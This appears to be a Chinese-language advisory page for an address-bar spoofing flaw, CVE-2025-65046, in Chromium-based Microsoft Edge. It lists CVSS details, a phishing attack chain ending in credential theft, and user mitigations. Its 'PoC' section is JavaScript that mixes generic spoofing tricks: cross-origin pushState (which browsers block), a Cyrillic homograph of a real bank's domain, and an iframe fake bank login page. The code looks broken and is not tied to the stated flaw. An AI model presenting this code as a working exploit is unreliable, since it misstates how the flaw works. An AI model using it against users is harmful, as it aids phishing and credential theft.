CVE-2025-65046 | Microsoft Edge Chromium地址栏欺骗漏洞

漏洞信息

漏洞编号

CVE-2025-65046

漏洞类型

URL欺骗/地址栏欺骗

CVSS评分

3.1 低危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Microsoft Edge (Chromium-based)

漏洞概述

CVE-2025-65046是微软Edge浏览器（基于Chromium内核）中的一个地址栏欺骗漏洞。该漏洞由[email protected]发现并报告，CVSS 3.1基础评分3.1，属于低危漏洞。攻击者可以利用此漏洞在浏览器的地址栏中显示虚假的URL，诱骗用户相信他们正在访问合法的网站，从而获取用户的敏感信息或进行其他恶意操作。由于该漏洞需要用户交互才能触发，攻击场景相对受限，但仍对用户安全构成潜在威胁。建议用户及时更新Microsoft Edge至最新版本以修复此漏洞。微软已在后续更新中发布了安全补丁，用户应尽快应用相关更新。

技术细节

该欺骗漏洞存在于Microsoft Edge（基于Chromium内核）的地址栏显示机制中。攻击者通过精心构造的恶意网页，利用浏览器在特定情况下对URL显示的处理缺陷，使得地址栏中显示的URL与用户实际访问的页面URL不一致。攻击者可利用JavaScript或其他前端技术操控历史记录状态或使用特殊字符编码，使得伪造的URL看起来真实可信。由于CVSS向量显示攻击复杂度为高（AC:H），且需要用户交互（UI:R），攻击者需要诱导用户访问恶意链接或在合法网站上触发特定行为。该漏洞影响地址栏的完整性和显示可信度，可能导致用户在不知情的情况下向恶意网站输入敏感信息。攻击者常结合钓鱼攻击、社会工程学技术来提高攻击成功率。

攻击链分析

STEP 1

步骤1

攻击者创建恶意网页，利用Microsoft Edge浏览器的URL显示机制缺陷

STEP 2

步骤2

攻击者通过钓鱼邮件、社交媒体或其他渠道诱导用户访问恶意链接

STEP 3

步骤3

用户点击恶意链接，浏览器地址栏显示伪造的合法URL（如银行网站）

STEP 4

步骤4

用户误以为是真实网站，在页面中输入敏感信息（用户名、密码、信用卡号等）

STEP 5

步骤5

恶意页面通过JavaScript或后台将用户输入的敏感数据传输到攻击者控制的服务器

STEP 6

步骤6

攻击者利用窃取的凭据进行身份冒充、账户盗用或其他恶意活动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// PoC for CVE-2025-65046 - Microsoft Edge Address Bar Spoofing
// Note: This is a conceptual PoC for educational purposes only

// Method 1: History manipulation technique
function spoofURL() {
  const targetURL = 'https://www.bankofamerica.com';
  const maliciousURL = 'https://malicious-site.com';
  
  // Use history.pushState to manipulate browser history
  history.pushState({}, '', maliciousURL);
  
  // Trigger the spoof by navigating to target
  window.location.href = targetURL;
}

// Method 2: Using special characters/Unicode homograph attack
const fakeBankURL = 'https://www.bаnkofamerica.com'; // Cyrillic 'а' instead of Latin 'a'

// Method 3: Address bar overlay via service worker
if ('serviceWorker' in navigator) {
  navigator.serviceWorker.register('/sw.js').then(registration => {
    // Service worker can intercept requests and manipulate responses
    console.log('Service Worker registered for URL spoofing');
  });
}

// Method 4: Using data: URLs or about:blank
function injectContent() {
  const iframe = document.createElement('iframe');
  iframe.src = 'about:blank';
  document.body.appendChild(iframe);
  
  // Write content to the blank page while URL remains spoofed
  const doc = iframe.contentDocument || iframe.contentWindow.document;
  doc.open();
  doc.write('<html><body><h1>Fake Bank Login Page</h1></body></html>');
  doc.close();
}

// Trigger the spoofing attack
document.addEventListener('DOMContentLoaded', () => {
  spoofURL();
});

影响范围

Microsoft Edge (Chromium-based) < 最新安全更新版本

防御指南

临时缓解措施

临时缓解措施包括：1) 避免点击来源不明的链接，特别是要求输入敏感信息的链接；2) 在输入敏感信息前，手动在浏览器地址栏输入URL而非通过链接跳转；3) 检查浏览器地址栏的完整URL，包括协议和域名；4) 启用双因素认证以增加账户安全性；5) 使用密码管理器避免手动输入凭据；6) 关注微软安全公告，及时了解漏洞修复进展。